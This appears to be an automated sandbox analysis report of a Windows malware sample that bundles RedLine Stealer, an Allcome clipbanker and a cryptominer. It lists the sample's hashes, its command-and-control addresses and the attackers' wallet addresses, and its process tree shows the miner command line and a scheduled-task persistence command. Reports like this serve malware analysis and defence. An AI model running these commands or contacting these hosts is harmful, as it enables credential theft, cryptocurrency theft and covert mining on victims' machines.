Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-02-2022 11:46

General

  • Target

    463f4d8ebcbe894ce30c7d08f6e469d934399b7be6d208ccdddf319dfc57e6fe.exe

  • Size

    4.5MB

  • MD5

    22b96b68b4372ff2ce604723e9436963

  • SHA1

    066ff406521cc2f0aed70414ee8d4d7751d0fe2a

  • SHA256

    463f4d8ebcbe894ce30c7d08f6e469d934399b7be6d208ccdddf319dfc57e6fe

  • SHA512

    0ecde5a89dd548cf16867c9a6c66c5b12f2b2e51920c1ab7cc1ff241f69a03116fe011aed2172c00cfe708c77856d5fe19d59b01a3880e3dfe38509a682d8a38

Malware Config

Extracted

Family

redline

Botnet

@Zexan

C2

92.255.85.137:41320

Attributes
  • auth_value

    da8092c88adbe82a93341dec420f0fa7

Extracted

Family

allcome

C2

http://dba692117be7b6d3480fe5220fdd58b38bf.xyz/API/Clipper/configure.php?cf6zrlhn=Rachel

Wallets

DCbpjBAroXBj3jrvq8HRPAKd8wYPnBwwi7

rKewCaU4Q6gqJnb5nJqkDY69QoxHKXAJZi

Xiem2Rw5LULbzv6rM49FqKAKD1nHSxpjxb

TZ3Pn82NBECik8ujtc3Wu5AVsQLCdt7cG1

t1Pxn7QZPAVhrsd2cdPHDEjDR1jtwpoUvbT

GDKPOPZWADWVDB2B743X7Q5QIMXIFJTIJ3K3JTR5P2EKO22GJQRAZRKC

497qdSyfY8t9dYnAGTnk8UigUbUPL4MXTFAxobWPDZ5rReSiVNL22GEGt9ptgNbDbTe3qyj3oRq2LfEYbws8yGqnSjBWHR6

qra53qtr5kvaye7gvf5algrre5h0w6harqxluum6kp

bc1q79xgc502sqzt4qz0jhr7lr7qdxkf2z006gym0l

0X9BD5F03363CA0231A32B3B36AE2CF01623E2D1FE

LcPqsR8yyzukNBgoKrq3pKEXV4rpuMeF91

ronin:09864801afc2b70c960366f4c8ad806fe9d6965d

ltc1qsdn52gjku7sts4r64fyqelqkfm789gvagglnaj

bc1q79xgc502sqzt4qz0jhr7lr7qdxkf2z006gym0l

Signatures

  • Allcome

    A clipbanker that supports stealing different cryptocurrency wallets and payment forms.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 21 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 19 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 38 IoCs
  • Suspicious use of SetThreadContext 39 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\463f4d8ebcbe894ce30c7d08f6e469d934399b7be6d208ccdddf319dfc57e6fe.exe
    "C:\Users\Admin\AppData\Local\Temp\463f4d8ebcbe894ce30c7d08f6e469d934399b7be6d208ccdddf319dfc57e6fe.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3728
      • C:\Users\Admin\AppData\Local\Temp\soska.exe
        "C:\Users\Admin\AppData\Local\Temp\soska.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1588
        • C:\Windows\bfsvc.exe
          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
          4⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:3756
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3056
          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4020
            • C:\Windows\bfsvc.exe
              C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
              6⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:3208
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
              6⤵
                PID:2568
                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of SetThreadContext
                  PID:3164
                  • C:\Windows\bfsvc.exe
                    C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                    8⤵
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:1340
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                    8⤵
                      PID:2368
                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                        "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                        9⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of SetThreadContext
                        PID:336
                        • C:\Windows\bfsvc.exe
                          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                          10⤵
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:3592
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                          10⤵
                            PID:1396
                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                              11⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of SetThreadContext
                              PID:2968
                              • C:\Windows\bfsvc.exe
                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                12⤵
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:2212
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                12⤵
                                  PID:2576
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                    13⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Suspicious use of SetThreadContext
                                    PID:3208
                                    • C:\Windows\bfsvc.exe
                                      C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                      14⤵
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1384
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                      14⤵
                                        PID:732
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                          "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                          15⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of SetThreadContext
                                          PID:1464
                                          • C:\Windows\bfsvc.exe
                                            C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                            16⤵
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:3052
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                            16⤵
                                              PID:2000
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                17⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Suspicious use of SetThreadContext
                                                PID:1700
                                                • C:\Windows\bfsvc.exe
                                                  C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                  18⤵
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:1808
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                  18⤵
                                                    PID:3632
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                      19⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Suspicious use of SetThreadContext
                                                      PID:3988
                                                      • C:\Windows\bfsvc.exe
                                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                        20⤵
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:2412
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                        20⤵
                                                          PID:1412
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                            21⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Suspicious use of SetThreadContext
                                                            PID:2372
                                                            • C:\Windows\bfsvc.exe
                                                              C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                              22⤵
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:1960
                                                            • C:\Windows\explorer.exe
                                                              C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                              22⤵
                                                                PID:3416
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                  23⤵
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:3220
                                                                  • C:\Windows\bfsvc.exe
                                                                    C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                    24⤵
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:2732
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                    24⤵
                                                                      PID:3828
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                        25⤵
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:456
                                                                        • C:\Windows\bfsvc.exe
                                                                          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                          26⤵
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:1968
                                                                        • C:\Windows\explorer.exe
                                                                          C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                          26⤵
                                                                            PID:1784
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                              27⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:3868
                                                                              • C:\Windows\bfsvc.exe
                                                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                                28⤵
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:2128
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                                28⤵
                                                                                  PID:2816
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                    29⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:972
                                                                                    • C:\Windows\bfsvc.exe
                                                                                      C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                                      30⤵
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:528
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                                      30⤵
                                                                                        PID:3196
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                          31⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3044
                                                                                          • C:\Windows\bfsvc.exe
                                                                                            C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                                            32⤵
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:3956
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                                            32⤵
                                                                                              PID:1464
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                33⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:924
                                                                                                • C:\Windows\bfsvc.exe
                                                                                                  C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                                                  34⤵
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:3756
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                                                  34⤵
                                                                                                    PID:2000
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                      35⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:828
                                                                                                      • C:\Windows\bfsvc.exe
                                                                                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                                                        36⤵
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:1932
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                                                        36⤵
                                                                                                          PID:3928
                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                            37⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:2340
                                                                                                            • C:\Windows\bfsvc.exe
                                                                                                              C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                                                              38⤵
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:560
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                                                              38⤵
                                                                                                                PID:676
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                                  39⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:388
                                                                                                                  • C:\Windows\bfsvc.exe
                                                                                                                    C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool etc.2miners.com:1010 -wal 0x8C40cd0F96391e6afc8F91744843EFc210e6B95d -coin etc -worker platina
                                                                                                                    40⤵
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:2032
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "platina" "etc"
                                                                                                                    40⤵
                                                                                                                      PID:2860
                                          • C:\Users\Admin\AppData\Local\Temp\bayden.exe
                                            "C:\Users\Admin\AppData\Local\Temp\bayden.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:3796
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /tn NvTmRep_CrashReport3_{B2FE1952-0186} /sc MINUTE /tr C:\Users\Admin\AppData\Local\CrashDumps\subst.exe
                                              4⤵
                                              • Creates scheduled task(s)
                                              PID:1220
                                      • C:\Users\Admin\AppData\Local\CrashDumps\subst.exe
                                        C:\Users\Admin\AppData\Local\CrashDumps\subst.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3940

                                      Network

                                      MITRE ATT&CK Enterprise v6

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • memory/336-513-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/528-598-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/560-630-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/676-631-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/732-535-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/1340-510-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/1384-534-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/1396-519-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/1412-559-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/1464-607-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/1464-537-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/1588-485-0x00007FF638980000-0x00007FF639AA8000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/1700-545-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/1784-583-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/1808-551-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/1932-622-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/1960-566-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/1968-582-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/2000-615-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/2000-543-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/2032-638-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/2128-590-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/2212-526-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/2368-512-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/2372-561-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/2412-124-0x0000000000450000-0x00000000006D6000-memory.dmp

                                        Filesize

                                        2.5MB

                                      • memory/2412-558-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/2412-121-0x0000000000400000-0x0000000000B54000-memory.dmp

                                        Filesize

                                        7.3MB

                                      • memory/2412-120-0x0000000000D30000-0x0000000000D31000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2412-119-0x0000000000D20000-0x0000000000D21000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2412-126-0x0000000000401000-0x000000000041A000-memory.dmp

                                        Filesize

                                        100KB

                                      • memory/2412-118-0x0000000000D10000-0x0000000000D11000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2412-117-0x0000000000D00000-0x0000000000D01000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2412-127-0x000000000041A000-0x000000000043E000-memory.dmp

                                        Filesize

                                        144KB

                                      • memory/2412-115-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2412-116-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2568-503-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/2576-527-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/2732-574-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/2816-591-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/2860-639-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/2968-521-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/3052-542-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/3056-492-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/3056-490-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/3164-505-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/3196-599-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/3208-529-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/3208-502-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/3416-567-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/3592-518-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/3632-550-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/3728-140-0x00000000095F0000-0x000000000962E000-memory.dmp

                                        Filesize

                                        248KB

                                      • memory/3728-136-0x0000000009AF0000-0x000000000A0F6000-memory.dmp

                                        Filesize

                                        6.0MB

                                      • memory/3728-204-0x000000000BA10000-0x000000000BF3C000-memory.dmp

                                        Filesize

                                        5.2MB

                                      • memory/3728-203-0x000000000B310000-0x000000000B4D2000-memory.dmp

                                        Filesize

                                        1.8MB

                                      • memory/3728-190-0x000000000AFF0000-0x000000000B040000-memory.dmp

                                        Filesize

                                        320KB

                                      • memory/3728-128-0x0000000000400000-0x0000000000420000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/3728-153-0x000000000A5E0000-0x000000000A5FE000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/3728-152-0x000000000ABA0000-0x000000000AC32000-memory.dmp

                                        Filesize

                                        584KB

                                      • memory/3728-150-0x0000000009940000-0x00000000099A6000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/3728-151-0x000000000A520000-0x000000000A596000-memory.dmp

                                        Filesize

                                        472KB

                                      • memory/3728-137-0x000000007367E000-0x000000007367F000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3728-138-0x0000000009590000-0x00000000095A2000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/3728-142-0x0000000009630000-0x000000000967B000-memory.dmp

                                        Filesize

                                        300KB

                                      • memory/3728-139-0x00000000096C0000-0x00000000097CA000-memory.dmp

                                        Filesize

                                        1.0MB

                                      • memory/3728-147-0x000000000A600000-0x000000000AAFE000-memory.dmp

                                        Filesize

                                        5.0MB

                                      • memory/3728-141-0x00000000099C0000-0x00000000099C1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3756-491-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/3756-614-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/3756-489-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/3828-575-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/3928-623-0x0000000140000000-0x000000014002A000-memory.dmp

                                        Filesize

                                        168KB

                                      • memory/3956-606-0x0000000140000000-0x0000000140815000-memory.dmp

                                        Filesize

                                        8.1MB

                                      • memory/3988-553-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB

                                      • memory/4020-497-0x00007FF663920000-0x00007FF664A48000-memory.dmp

                                        Filesize

                                        17.2MB